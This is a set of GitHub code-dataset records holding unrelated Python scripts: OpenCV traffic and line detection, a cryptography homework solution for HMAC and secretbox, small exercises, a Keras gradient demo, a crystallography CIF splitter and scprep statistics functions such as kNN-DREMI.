  mask_path = '../../data/gt/2016-ITS-BrnoCompSpeed/dataset/session{}_{}/video_mask.png'.format (ses_id, view)\n    masks[view] = cv2.imread (mask_path, 0)\n\nctr = 0\nwhile True:\n    ctr += 1\n\n    for view in VIEW : \n        img_color = next (fi[view])\n        imgs_color[view] = img_color\n        img = cv2.cvtColor (img_color, cv2.COLOR_BGR2GRAY)\n\n        # normal 3FD\n        prev_intersect = cv2.threshold (cv2.absdiff (prev_img[view][1], prev_img[view][0]), 25, 255, cv2.THRESH_BINARY)[1]\n        next_intersect = cv2.threshold (cv2.absdiff (img, prev_img[view][1]), 25, 255, cv2.THRESH_BINARY)[1]\n\n        # little 3FD enhancement\n        P1 = cv2.bitwise_and (prev_intersect, next_intersect)\n        prev_intersect_dilate = process_morphological (prev_intersect) \n        next_intersect_dilate = process_morphological (next_intersect)\n        P2 = cv2.bitwise_and (prev_intersect_dilate, next_intersect_dilate)\n\n        fg = cv2.bitwise_and (P2, masks[view])\n        fg = process_morphological (fg)\n\n        fgs[view] = fg\n\n        # 
update\n prev_img[view][0] = prev_img[view][1]\n prev_img[view][1] = img\n\n print (ctr)\n if ctr == 284 : \n with open (\"result/3_3D_box/box_ground.json\", 'r') as f_b : \n boxes_ground = json.load (f_b)\n\n for view in VIEW : \n # first, draw ground truth\n points = GT['session{}'.format (ses_id)][view]\n corner = np.float32 (get_corner_ground (vp[view]['vp1'], vp[view]['vp2'], points))\n\n \"\"\"\n # get dst_color with rectangle\n box_ground = np.matrix ([\n [VDL_IDX + 600, selected[1] + selected[3], 1], # (bottom, left)\n [VDL_IDX + 600, selected[1], 1], # (top, left)\n [VDL_IDX + 600 + selected[2], selected[1], 1], # (top, right)\n [VDL_IDX + 600 + selected[2], selected[1] + selected[3], 1] # (bottom, right)\n ]).transpose ()\n # \"\"\"\n\n # get inverse perspective\n M_inv = cv2.getPerspectiveTransform (corner_wrap, corner)\n \n \"\"\"\n # draw on the real image\n # box_ground = M_inv.dot (box_ground).transpose () # get inverse location of box\n # box_ground /= box_ground[:, 2] # divide by homogoneous scale\n # box_ground = box_ground[:, :-1].astype ('int').tolist () # convert into index\n # \"\"\"\n\n box_ground = np.matrix (boxes_ground[view])\n \n\n # img_color = cv2.cvtColor (fg, cv2.COLOR_GRAY2BGR)\n\n # get blobs\n blobs = get_contours (fgs[view])\n\n fgs[view] = cv2.cvtColor (fgs[view], cv2.COLOR_GRAY2BGR)\n inverse_img = draw_polylines (fgs[view], box_ground.tolist (), color=(0,255,0), thickness=5)\n cv2.imwrite ('result/fgs-{}.jpg'.format (view), inverse_img)\n\n # get the blobs that within box_ground\n is_found = False\n for b in blobs : \n (x,y, w, h) = cv2.boundingRect (b)\n for cp in box_ground.tolist () : \n if cp[0] >= x and cp[0] <= x+w and cp[1] >= y and cp[1] <= y+h : \n is_found = True\n break\n\n if is_found : \n # then construct line vertical height\n max_cp_y = np.min (box_ground[:, 1]) - 3 # small tradeoff\n box_floor = []\n for cp in box_ground.tolist () : \n cp_h = list (cp)\n cp_h[1] -= abs (y - max_cp_y)\n\n cv2.line (inverse_img, tuple (cp), tuple (cp_h), (0, 255, 0), 5) \n\n box_floor.append (cp_h)\n\n cv2.imwrite ('result/fgs_w_tail-{}.jpg'.format (view), inverse_img)\n\n inverse_img = draw_polylines (inverse_img, box_floor, color=(0,255,0), thickness=5)\n break\n\n\n cv2.imwrite ('result/{}-{}.jpg'.format (view, ctr), inverse_img)\n\n break\n # show image\n cv2.imshow ('default', img_color)\n\n if (cv2.waitKey(1) & 0xFF == ord('q')) :\n break\n\n","repo_name":"adibPr/traffic-monitoring","sub_path":"test/fusion/8_3DBoxTSI.py","file_name":"8_3DBoxTSI.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"17380914785","text":"import json\r\nimport os\r\nimport hashlib\r\nimport sys\r\nimport hmac\r\n#from sys import byteorder\r\nfrom cryptography.hazmat.primitives.poly1305 import Poly1305\r\nfrom nacl import encoding\r\nimport salsa20\r\nimport secrets\r\nfrom nacl.secret import SecretBox\r\nfrom nacl.exceptions import CryptoError\r\n\r\nf = open('example_input.json')\r\ninputs = json.loads(json.dumps(json.load(f)))\r\n#inputs = json.loads(json.dumps(json.load(sys.stdin)))\r\noutputs = {}\r\n\r\ndef xor_bytes(a, b):\r\n assert len(a) == len(b)\r\n return bytes(x ^ y for x, y in zip(a, b))\r\n\r\ndef secretbox(key, nonce, plaintext):\r\n length = len(plaintext) + 32\r\n salsa20_keystream = salsa20.XSalsa20_keystream(length, nonce, key)\r\n poly1305_key = salsa20_keystream[0:32]\r\n #print(\"salsa20_keystream\")\r\n #print(salsa20_keystream.hex())\r\n 
#print(\"poly key\")\r\n    #print(poly1305_key.hex())\r\n    #print(len(poly1305_key))\r\n    partial_keystream = salsa20_keystream[32:61] # bytes 33 to 61, after the first 32 bytes used for the poly1305 key\r\n    #print(\"partial keystream\")\r\n    #print(partial_keystream.hex())\r\n    #print(len(partial_keystream))\r\n    #print(type(partial_keystream))\r\n    #print(type(p4_message.encode(\"ascii\")))\r\n    #print(len(p4_message.encode(\"ascii\")))\r\n    xor_ciphertext = xor_bytes(partial_keystream, p4_message.encode(\"ascii\"))\r\n    poly1305_mac = Poly1305.generate_tag(poly1305_key, xor_ciphertext)\r\n    #print(type(poly1305_mac))\r\n    secretbox_ciphertext = poly1305_mac + xor_ciphertext\r\n    return secretbox_ciphertext\r\n\r\n#Problem 1\r\np1_Key = bytes.fromhex(inputs[\"problem1\"][\"key\"])\r\np1_Message = inputs[\"problem1\"][\"message\"].encode(\"ascii\")\r\nipad = b\"\\x36\" * 64\r\nopad = b\"\\x5c\" * 64\r\n\r\nmasked_inner_key = xor_bytes(p1_Key, ipad)\r\nmaskedInnerKeyandMessageHash = hashlib.sha256(masked_inner_key+p1_Message).digest()\r\nmasked_outer_key = xor_bytes(p1_Key, opad)\r\nhmacKeyMessage = hashlib.sha256(masked_outer_key + maskedInnerKeyandMessageHash).hexdigest()\r\n\r\nhmacdigest = hmac.new(p1_Key, msg=p1_Message, digestmod=hashlib.sha256).digest()\r\n\r\nassert hmac.compare_digest(hmacKeyMessage, hmacdigest.hex())\r\noutputs[\"problem1\"] = hmacdigest.hex()\r\n#print(hmacKeyMessage)\r\n#print(hmacdigest.hex())\r\n\r\n#Problem 2\r\nlength = (int(inputs[\"problem2\"]))\r\nnonce = b\"E\"*24\r\nkey = b\"D\"*32\r\noutputs[\"problem2\"] = salsa20.XSalsa20_keystream(length, nonce, key).hex()\r\n\r\n#Problem 3\r\np3_message = bytes(inputs[\"problem3\"], encoding='utf-8')\r\np3_key = b\"F\" * 32\r\noutputs[\"problem3\"] = Poly1305.generate_tag(p3_key, p3_message).hex()\r\n\r\n#Problem 4\r\np4_message = inputs[\"problem4\"]\r\np4_key = b\"G\" * 32\r\np4_nonce = b\"H\" * 24\r\n\r\noutputs[\"problem4\"] = secretbox(p4_key, p4_nonce, p4_message).hex()\r\n\r\n#verification check\r\nciphertext = SecretBox(p4_key).encrypt(bytes(p4_message, encoding=\"utf-8\"), p4_nonce).hex()\r\nsecretbox_ciphertext = ciphertext[len(p4_nonce)*2:len(ciphertext)] # slice the resulting ciphertext to omit the prepended 24-byte \"H\" nonce\r\nassert secretbox_ciphertext == outputs[\"problem4\"]\r\n\r\nprint(json.dumps(outputs, indent=\" \"))","repo_name":"kevinkenzhao/app_crypto","sub_path":"pset5/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
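# [Editor's note] Editorial addition, not original source: the ipad/opad
# construction in Problem 1 above is the textbook HMAC definition. A
# self-contained, stdlib-only check with made-up inputs:
import hashlib, hmac
key = b"k" * 64                      # hypothetical key, one full SHA-256 block
msg = b"attack at dawn"
inner = hashlib.sha256(bytes(k ^ 0x36 for k in key) + msg).digest()
manual = hashlib.sha256(bytes(k ^ 0x5C for k in key) + inner).hexdigest()
assert manual == hmac.new(key, msg, hashlib.sha256).hexdigest()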
 +{"seq_id":"35923157413","text":"# Storing the data in lists\r\naluno = []\r\nnota = []\r\nprs = []\r\nresume = []\r\nfor c in range(0, 10):\r\n    aluno.append(str(input('Student: '))) # element 0\r\n    nota.append(float(input('Grade: '))) # element 1\r\n    prs.append(float(input('Attendance: '))) # element 2\r\n    list = [(aluno[c]), nota[c], prs[c]] # grouping the lists\r\n    resume.append(list)\r\n\r\nprint(\"-=-\"*30)\r\n\r\n\r\n# Function to check whether the student passed\r\ndef aprova(resume):\r\n    for a in resume:\r\n        if a[1] >= 7 and a[2] >= 75:\r\n            print(f'{a[0]} PASSED with grade {a[1]} and attendance of {a[2]}% ')\r\n        else:\r\n            print(f'{a[0]} FAILED with grade {a[1]} and attendance of {a[2]}% ')\r\n\r\n\r\naprova(resume)\r\n","repo_name":"Gabriel-olimpio/python-algos","sub_path":"quest3.py","file_name":"quest3.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"21157790386","text":"'''\n2020 has been a tough year for travelers. Air travel is especially problematic as passengers need to spend long periods in security lines, waiting areas, and crowded cabins where social distancing is difficult to maintain.\nTo minimize the spread of COVID-19, each airline has decided to reorganize all of their flight routes in a linear fashion. The airlines are hoping that by not making any one country a \"hub\", the spread of the virus will be significantly limited.\nAn airline's flights normally service N countries, running in various directions. Amidst the pandemic, each airline has carefully arranged these N countries in a sequence, with each assigned a number from 1 to N. Flights are limited to run only between pairs of countries that are adjacent in this sequence, with service in both directions. No other flights are available. That is, flights are available from country i to country j if and only if |i - j| = 1.\nTo make things more complicated, some countries have issued their own restrictions on incoming and outgoing travel. These restrictions are indicated by the characters I_{1..N} and O_{1..N}, each of which is either \"N\" or \"Y\":\nIf I_i = \"N\", then incoming flights to country i from any other country are disallowed. Otherwise, if I_i = \"Y\", they may be allowed.\nIf O_i = \"N\", then outgoing flights from country i to any other country are disallowed. Otherwise, if O_i = \"Y\", they may be allowed.\nIf a flight between adjacent countries is not disallowed by either the departure or arrival country's restrictions, then it's allowed.\nAs a consulting data scientist in the airline industry, your job is to determine which trips between the various countries are possible. Let P_{i,j} = \"Y\" if it's possible to travel from country i to country j via a sequence of 0 or more flights (which may pass through other countries along the way), and P_{i,j} = \"N\" otherwise. Note that P_{i,i} is always \"Y\". Output this N*N matrix of characters.\nInput\nInput begins with an integer T, the number of airlines. For each airline, there are three lines. The first line contains the integer N. The second line contains the length-N string I_{1..N}. The third line contains the length-N string O_{1..N}.\nOutput\nFor the i-th airline, output a line containing \"Case #i:\" followed by N more lines, the i-th of which contains the length-N string P_{i,1..N}.\nConstraints\n1 <= T <= 100\n2 <= N <= 50\nExplanation of Sample\nIn the first case, there are two countries with no restrictions. Therefore, trips between all pairs of countries are possible.\nIn the second case, there are two countries, and traveling into country 1 is restricted. 
Since country 2 is the only country adjacent to country 1, the only impossible trip is from country 2 to country 1.\nIn the third case, there are two countries, both of which restrict inbound travel.\nIn the fourth case, one may not enter countries 2 or 3, nor exit country 4.\nSample Input\n5\n2\nYY\nYY\n2\nNY\nYY\n2\nNN\nYY\n5\nYNNYY\nYYYNY\n10\nNYYYNNYYYY\nYYNYYNYYNY\nSample Output\nCase #1: \nYY\nYY\nCase #2: \nYY\nNY\nCase #3: \nYN\nNY\nCase #4: \nYNNNN\nYYNNN\nNNYYN\nNNNYN\nNNNYY\nCase #5: \nYYYNNNNNNN\nNYYNNNNNNN\nNNYNNNNNNN\nNNYYNNNNNN\nNNYYYNNNNN\nNNNNNYNNNN\nNNNNNNYYYN\nNNNNNNYYYN\nNNNNNNNNYN\nNNNNNNNNYY\n'''\n'''\nNYNYY incoming\nYYYNY outgoing\n'''\ndef genMatrix(N):\n matrix = []\n for i in range(N):\n matrix.append(i*'N' + 'Y' + ((N-i)-1)*'N') #kubu formula\n return matrix\n\ntestCase = int(input())\ntt = 0\nwhile(tt tuple[np.ndarray, np.ndarray]:\n num_samples = 100\n x = np.array(\n [[i, i] for i in range(num_samples)],\n dtype=np.float32,\n )\n y = np.array(\n list(range(num_samples)),\n dtype=np.float32,\n ).reshape(-1, 1)\n return x, y\n\n\ndef build_model() -> Sequential:\n model = Sequential()\n model.add(Dense(units=1, input_shape=(2,), name=\"hidden\"))\n model.add(Activation(\"relu\", name=\"relu\"))\n model.add(Dense(units=1, name=\"output\"))\n model.summary()\n return model\n\n\ndef get_gradients(\n x_test: np.ndarray,\n y_test: np.ndarray,\n model: Sequential,\n loss_object: tf.keras.losses.Loss,\n) -> list[tuple[tf.Tensor, tf.Tensor]]:\n with tf.GradientTape() as tape:\n y_pred = model(x_test, training=True)\n loss_value = loss_object(y_test, y_pred)\n grads = tape.gradient(\n loss_value,\n model.trainable_variables,\n )\n grad_var_tuples = [\n (g, w) for (g, w) in zip(grads, model.trainable_variables)\n ]\n return grad_var_tuples\n\n\ndef main() -> None:\n x, y = get_dataset()\n\n model = build_model()\n\n model.compile(\n loss=\"mse\",\n optimizer=Adam(learning_rate=1e-2),\n metrics=[\"mse\"],\n )\n\n tb_callback = TensorBoard(\n log_dir=MODEL_LOG_DIR,\n embeddings_freq=0,\n write_graph=True,\n )\n\n model.fit(\n x=x,\n y=y,\n verbose=1,\n batch_size=1,\n epochs=0,\n callbacks=[tb_callback],\n )\n\n model.layers[0].set_weights(\n [\n np.array([[-0.250], [1.000]]),\n np.array([0.100]),\n ]\n )\n model.layers[2].set_weights(\n [\n np.array([[1.250]]),\n np.array([0.125]),\n ]\n )\n\n # Test\n loss_object = MeanSquaredError()\n\n x_test = np.array([[2, 2]])\n y_test = np.array([[2]])\n\n y_pred = model.predict(x_test)\n print(f\"Pred: {y_pred}\")\n\n gradients = get_gradients(\n x_test,\n y_test,\n model,\n loss_object,\n )\n\n for grads, weight in gradients:\n print(f\"Layer name: {weight.name}\")\n print(f\"Weights:\\n{weight.numpy()}\")\n print(f\"Grads:\\n{grads.numpy()}\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"franneck94/UdemyTF","sub_path":"Chapter05_DNN/Chapter5_6_NeuralNetworkMath/gradientsAndGraph.py","file_name":"gradientsAndGraph.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"63"} +{"seq_id":"28247479057","text":"# Author: Jintao Huang\n# Email: hjt_study@qq.com\n# Date: \n\nfrom typing import List\n\n\nclass Solution:\n def is_ok(self, weights, days, mid):\n n = mid\n d = 1\n for i in range(len(weights)):\n w = weights[i]\n if w > n:\n n = mid\n d += 1\n n -= w\n if d > days:\n return False\n return True\n\n def shipWithinDays(self, weights: List[int], days: int) -> int:\n lo, hi = max(weights), sum(weights)\n while lo < hi:\n mid = lo 
+ (hi - lo) // 2\n if self.is_ok(weights, days, mid):\n hi = mid\n else:\n lo = mid + 1\n return lo\n\n\nweights = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\ndays = 5\nprint(Solution().shipWithinDays(weights, days))\n","repo_name":"Jintao-Huang/leetcode_notebook","sub_path":"python/2 labuladong的算法小抄/5 高频面试系列/3.3 运输货物[1011].py","file_name":"3.3 运输货物[1011].py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"31744516723","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os, sys, tarfile \nglobal path\nimport shutil\npath = sys.path[0]\nmaindirname=\"/home/spasyud/cdb/\"\n#print(os.path.getsize('/home/spasyud/cdb/STRUCTURAL_DATABASE.db'))\ndef striplist(lines): \n return([line for line in lines if line.strip()]) \ndef getcifs(maindirname):\n try: \n try:\n ciflist=[]\n for dirpath, dirnames, filenames in os.walk(maindirname):\n for filename in filenames:\n size=os.path.getsize(os.path.join(dirpath, filename))\n \n if int(size)>=400000:\n print(filename, size)\n if (filename.lower()).endswith(\".cif\"): \n ciflist.append(os.path.join(dirpath, filename)) \n except UnicodeEncodeError:\n pass \n# print (\"scan\",ciflist)\n return ciflist\n except OSError:\n pass\n\n \ndef cifsplitter(ciffile):\n fnamefull=ciffile\n fnoe=os.path.splitext(fnamefull)[0]\n fcif=open(fnamefull, 'r')\n fcifread=fcif.read()\n fcif.close()\n if fcifread.find(\"_shelx_res_file\"):\n resfileb=fcifread.find(\"_shelx_res_file\")\n resfileend=fcifread.find(\"_shelx_res_checksum\")\n hklfileb=fcifread.find(\"_shelx_hkl_file\")\n hklend=fcifread.find(\"_shelx_hkl_checksum\")\n # # print \"resfileb=\", resfileb, \"resfileend=\", resfileend, \"hklb=\", hklfileb, \"hklend=\", hklend\n ciffileout=fcifread[:resfileb]\n resfileout=fcifread[resfileb+15:resfileend].replace(\";\",\"\")\n hklfileout=fcifread[hklfileb+15:(int(hklend)-1)].replace(\";\",\"\")\n hkllist=hklfileout.split(\"\\n\")\n hkloutlist=striplist(hkllist)\n hklfileout=\"\\n\".join(hkloutlist) \n cif=open(fnoe+\"_cd.cif\", 'w')\n cif.write(ciffileout)\n res=open(fnoe+\".res\", 'w')\n res.write(resfileout)\n hkl=open(fnoe+'.hkl', 'w')\n hkl.write(hklfileout)\n res.close()\n hkl.close() \n cif.close() \n os.remove(fnamefull)\ndef interact():\n maindirname=\"/home/spasyud/cdb\"\n cifs=getcifs(maindirname)\n for files in cifs:\n cifsplitter(files)\ninteract()","repo_name":"deonis1/linxtl","sub_path":"Modules/codcleaner.py","file_name":"codcleaner.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"20177592113","text":"\nimport numpy as np\nfrom scipy import signal\nfrom PIL import Image\n\n\ndef load_image_path(path):\n return np.asarray(Image.open(path))/255.0\n\ndef save(path, img):\n tmp = np.asarray(img*255.0, dtype=np.uint8)\n Image.fromarray(tmp).save(path)\n\ndef remove_noise_image(inp):\n # estimate 'background' color by a median filter\n bg = signal.medfilt2d(inp,11)\n save('images/background_estimation.jpeg', bg)\n\n # compute 'foreground' mask as anything that is significantly darker than\n # the background\n mask = inp < bg - 0.1\n save('images/foreground_mask.jpeg', mask)\n\n # return the input value for all pixels in the mask or pure white otherwise\n return np.where(mask, inp, 1.0)\n\n#load the file\nimage = Image.open('1.jpeg')\n\n#convert image to grayscale\nimage = image.convert('L')\n\n#resize the 
image\nnew_image = image.resize((832, 536)) \n\n#now carry out the operations on modified image\nnew_image.save('images/modified_image.jpeg')\ninp_destination = 'images/modified_image.jpeg'\nout_destination = 'images/output_image.jpeg'\n\ninput = load_image_path(inp_destination)\noutput = remove_noise_image(input)\n\nsave(out_destination, output)\n","repo_name":"parul7802/Amul_ads_Classification","sub_path":"image_processing/background_removal.py","file_name":"background_removal.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36965040147","text":"import library as lib\r\nimport cv2\r\nimport numpy as np\r\n\r\ncolor = np.array([[[100,0,255]]],dtype = np.uint8)\r\n# print(color)\r\n\r\nlower , upper = lib.getColorBounds(color)\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n _,frame = cap.read()\r\n frame,mask = lib.getMask(frame , lower , upper)\r\n edges , frame = lib.getLines(mask , frame) \r\n \r\n ##Now we begin contours\r\n \r\n cv2.imshow(\"Vdieo\" , frame)\r\n cv2.imshow(\"Line detector\" , edges)\r\n \r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\ncap.release()\r\ncv2.destroyAllWindows() \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# cv2.imshow(\"res\",result)\r\n# cv2.waitKey(0)","repo_name":"seifeldin7666-gmail-com/Final-Project","sub_path":"LineDetection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10906528720","text":"# author: Daniel Burkhardt \n# (C) 2018 Krishnaswamy Lab GPLv2\n\nimport numbers\nimport numpy as np\nfrom scipy import stats, sparse\nfrom sklearn import neighbors, metrics\nfrom . import plot, utils\nimport warnings\n\nplt = utils._try_import(\"matplotlib.pyplot\")\n\n\ndef EMD(x, y):\n \"\"\"Earth Mover's Distance between samples\n\n Calculates an approximation of Earth Mover's Distance (also called\n Wasserstein distance) for 2 variables. This can be thought of as the\n distance between two probability distributions. This metric is useful for\n identifying differentially expressed genes between two groups of cells. 
For\n more information see https://en.wikipedia.org/wiki/Wasserstein_metric.\n\n Parameters\n ----------\n x : array-like, shape=[n_samples]\n Input data (feature 1)\n y : array-like, shape=[n_samples]\n Input data (feature 2)\n\n Returns\n -------\n emd : float\n Earth Mover's Distance between x and y.\n\n Examples\n --------\n >>> import scprep\n >>> data = scprep.io.load_csv(\"my_data.csv\")\n >>> emd = scprep.stats.EMD(data['GENE1'], data['GENE2'])\n \"\"\"\n x, y = _vector_coerce_two_dense(x, y)\n return stats.wasserstein_distance(x, y)\n\n\ndef pairwise_correlation(X, Y):\n \"\"\"Pairwise Pearson correlation between columns of two matrices\n\n From https://stackoverflow.com/a/33651442/3996580\n\n Parameters\n ----------\n X : array-like, shape=[n_samples, m_features]\n Input data\n Y : array-like, shape=[n_samples, p_features]\n Input data\n\n Returns\n -------\n cor : np.ndarray, shape=[m_features, p_features]\n \"\"\"\n # Get number of rows in either X or Y\n N = X.shape[0]\n assert Y.shape[0] == N\n assert len(X.shape) <= 2\n assert len(Y.shape) <= 2\n X = utils.to_array_or_spmatrix(X).reshape(N, -1)\n Y = utils.to_array_or_spmatrix(Y).reshape(N, -1)\n if sparse.issparse(X) and not sparse.issparse(Y):\n Y = sparse.csr_matrix(Y)\n if sparse.issparse(Y) and not sparse.issparse(X):\n X = sparse.csr_matrix(X)\n # Store columnw-wise in X and Y, as they would be used at few places\n X_colsums = utils.matrix_sum(X, axis=0)\n Y_colsums = utils.matrix_sum(Y, axis=0)\n # Basically there are four parts in the formula. We would compute them\n # one-by-one\n N_times_sum_xy = utils.toarray(N * Y.T.dot(X))\n sum_x_times_sum_y = X_colsums * Y_colsums[:, None]\n var_x = N * utils.matrix_sum(utils.matrix_transform(X, np.power, 2),\n axis=0) - (X_colsums**2)\n var_y = N * utils.matrix_sum(utils.matrix_transform(Y, np.power, 2),\n axis=0) - (Y_colsums**2)\n # Finally compute Pearson Correlation Coefficient as 2D array\n cor = ((N_times_sum_xy - sum_x_times_sum_y) /\n np.sqrt(var_x * var_y[:, None]))\n return cor.T\n\n\ndef mutual_information(x, y, bins=8):\n \"\"\"Mutual information score with set number of bins\n\n Helper function for `sklearn.metrics.mutual_info_score` that builds a\n contingency table over a set number of bins.\n Credit: `Warran Weckesser `_.\n\n\n Parameters\n ----------\n x : array-like, shape=[n_samples]\n Input data (feature 1)\n y : array-like, shape=[n_samples]\n Input data (feature 2)\n bins : int or array-like, (default: 8)\n Passed to np.histogram2d to calculate a contingency table.\n\n Returns\n -------\n mi : float\n Mutual information between x and y.\n\n Examples\n --------\n >>> import scprep\n >>> data = scprep.io.load_csv(\"my_data.csv\")\n >>> mi = scprep.stats.mutual_information(data['GENE1'], data['GENE2'])\n \"\"\"\n x, y = _vector_coerce_two_dense(x, y)\n c_xy = np.histogram2d(x, y, bins)[0]\n mi = metrics.mutual_info_score(None, None, contingency=c_xy)\n return mi\n\n\ndef knnDREMI(x, y, k=10, n_bins=20, n_mesh=3, n_jobs=1,\n plot=False, return_drevi=False, **kwargs):\n \"\"\"kNN conditional Density Resampled Estimate of Mutual Information\n\n Calculates k-Nearest Neighbor conditional Density Resampled Estimate of\n Mutual Information as defined in Van Dijk et al, 2018. [1]_\n\n kNN-DREMI is an adaptation of DREMI (Krishnaswamy et al. 2014, [2]_) for\n single cell RNA-sequencing data. DREMI captures the functional relationship\n between two genes across their entire dynamic range. 
The key change to\n kNN-DREMI is the replacement of the heat diffusion-based kernel-density\n estimator from Botev et al., 2010 [3]_ by a k-nearest neighbor-based\n density estimator (Sricharan et al., 2012 [4]_), which has been shown to be\n an effective method for sparse and high dimensional datasets.\n\n Note that kNN-DREMI, like Mutual Information and DREMI, is not symmetric.\n Here we are estimating I(Y|X).\n\n Parameters\n ----------\n x : array-like, shape=[n_samples]\n Input data (independent feature)\n y : array-like, shape=[n_samples]\n Input data (dependent feature)\n k : int, range=[0:n_samples), optional (default: 10)\n Number of neighbors\n n_bins : int, range=[0:inf), optional (default: 20)\n Number of bins for density resampling\n n_mesh : int, range=[0:inf), optional (default: 3)\n In each bin, density will be calculcated around (mesh ** 2) points\n n_jobs : int, optional (default: 1)\n Number of threads used for kNN calculation\n plot : bool, optional (default: False)\n If True, DREMI create plots of the data like those seen in\n Fig 5C/D of van Dijk et al. 2018. (doi:10.1016/j.cell.2018.05.061).\n return_drevi : bool, optional (default: False)\n If True, return the DREVI normalized density matrix in addition\n to the DREMI score.\n **kwargs : additional arguments for `scprep.stats.plot_knnDREMI`\n\n Returns\n -------\n dremi : float\n kNN condtional Density resampled estimate of mutual information\n drevi : np.ndarray\n DREVI normalized density matrix. Only returned if `return_drevi`\n is True.\n\n Examples\n --------\n >>> import scprep\n >>> data = scprep.io.load_csv(\"my_data.csv\")\n >>> dremi = scprep.stats.knnDREMI(data['GENE1'], data['GENE2'],\n ... plot=True,\n ... filename='dremi.png')\n\n References\n ----------\n .. [1] van Dijk D *et al.* (2018),\n *Recovering Gene Interactions from Single-Cell Data Using Data\n Diffusion*, `Cell `_.\n .. [2] Krishnaswamy S *et al.* (2014),\n *Conditional density-based analysis of T cell signaling in single-cell\n data*, `Science `_.\n .. [3] Botev ZI *et al*. (2010), *Kernel density estimation via diffusion*,\n `The Annals of Statistics `_.\n .. [4] Sricharan K *et al*. (2012), *Estimation of nonlinear functionals of\n densities with confidence*, `IEEE Transactions on Information Theory\n `_.\n \"\"\"\n x, y = _vector_coerce_two_dense(x, y)\n\n if np.count_nonzero(x - x[0]) == 0 or np.count_nonzero(y - y[0]) == 0:\n warnings.warn(\n \"Attempting to calculate kNN-DREMI on a constant array. Returning `0`\",\n UserWarning)\n # constant input: mutual information is numerically zero\n if return_drevi:\n return 0, None\n else:\n return 0\n\n if not isinstance(k, numbers.Integral):\n raise ValueError(\n \"Expected k as an integer. Got {}\".format(type(k)))\n if not isinstance(n_bins, numbers.Integral):\n raise ValueError(\n \"Expected n_bins as an integer. Got {}\".format(type(n_bins)))\n if not isinstance(n_mesh, numbers.Integral):\n raise ValueError(\n \"Expected n_mesh as an integer. Got {}\".format(type(n_mesh)))\n\n # 0. Z-score X and Y\n x = stats.zscore(x)\n y = stats.zscore(y)\n\n # 1. 
Create bin and mesh points\n x_bins = np.linspace(min(x), max(x), n_bins + 1) # plus 1 for edges\n y_bins = np.linspace(min(y), max(y), n_bins + 1)\n x_mesh = np.linspace(min(x), max(x), ((n_mesh + 1) * n_bins) + 1)\n y_mesh = np.linspace(min(y), max(y), ((n_mesh + 1) * n_bins) + 1)\n\n # calculate the kNN density around the mesh points\n mesh_points = np.vstack([np.tile(x_mesh, len(y_mesh)),\n np.repeat(y_mesh, len(x_mesh))]).T\n\n # Next, we find the nearest points in the data from the mesh\n knn = neighbors.NearestNeighbors(n_neighbors=k, n_jobs=n_jobs).fit(\n np.vstack([x, y]).T) # this is the data\n # get dists of closests points in data to mesh\n dists, _ = knn.kneighbors(mesh_points)\n\n # Get area, density of each point\n area = np.pi * (dists[:, -1] ** 2)\n density = k / area\n\n # get list of all mesh points that are not bin intersections\n mesh_mask = np.logical_or(np.isin(mesh_points[:, 0], x_bins),\n np.isin(mesh_points[:, 1], y_bins))\n # Sum the densities of each point over the bins\n bin_density, _, _ = np.histogram2d(mesh_points[~mesh_mask, 0],\n mesh_points[~mesh_mask, 1],\n bins=[x_bins, y_bins],\n weights=density[~mesh_mask])\n bin_density = bin_density.T\n # sum the whole grid should be 1\n bin_density = bin_density / np.sum(bin_density)\n\n # Calculate conditional entropy\n # NB: not using thresholding here; entr(M) calcs -x*log(x) elementwise\n drevi = bin_density / \\\n np.sum(bin_density, axis=0) # columns sum to 1\n # calc entropy of each column\n cond_entropies = stats.entropy(drevi, base=2)\n\n # Mutual information (not normalized)\n marginal_entropy = stats.entropy(\n np.sum(bin_density, axis=1), base=2) # entropy of Y\n\n # Multiply the entropy of each column by the density of each column\n # Conditional entropy is the entropy in Y that isn't exmplained by X\n cond_sums = np.sum(bin_density, axis=0) # distribution of X\n conditional_entropy = np.sum(cond_entropies * cond_sums)\n mutual_info = marginal_entropy - conditional_entropy\n\n # DREMI\n marginal_entropy_norm = stats.entropy(np.sum(drevi, axis=1),\n base=2)\n cond_sums_norm = np.mean(drevi)\n conditional_entropy_norm = np.sum(cond_entropies * cond_sums_norm)\n\n dremi = marginal_entropy_norm - conditional_entropy_norm\n\n if plot:\n plot_knnDREMI(dremi, mutual_info,\n x, y, n_bins, n_mesh,\n density, bin_density, drevi, **kwargs)\n if return_drevi:\n return dremi, drevi\n else:\n return dremi\n\n\n@utils._with_pkg(pkg=\"matplotlib\", min_version=3)\ndef plot_knnDREMI(dremi, mutual_info, x, y, n_bins, n_mesh,\n density, bin_density, drevi,\n figsize=(12, 3.5), filename=None,\n xlabel=\"Feature 1\", ylabel=\"Feature 2\",\n title_fontsize=18, label_fontsize=16,\n dpi=150):\n \"\"\"Plot results of DREMI\n\n Create plots of the data like those seen in\n Fig 5C/D of van Dijk et al. 2018. [1]_\n Note that this function is not designed to be called manually. 
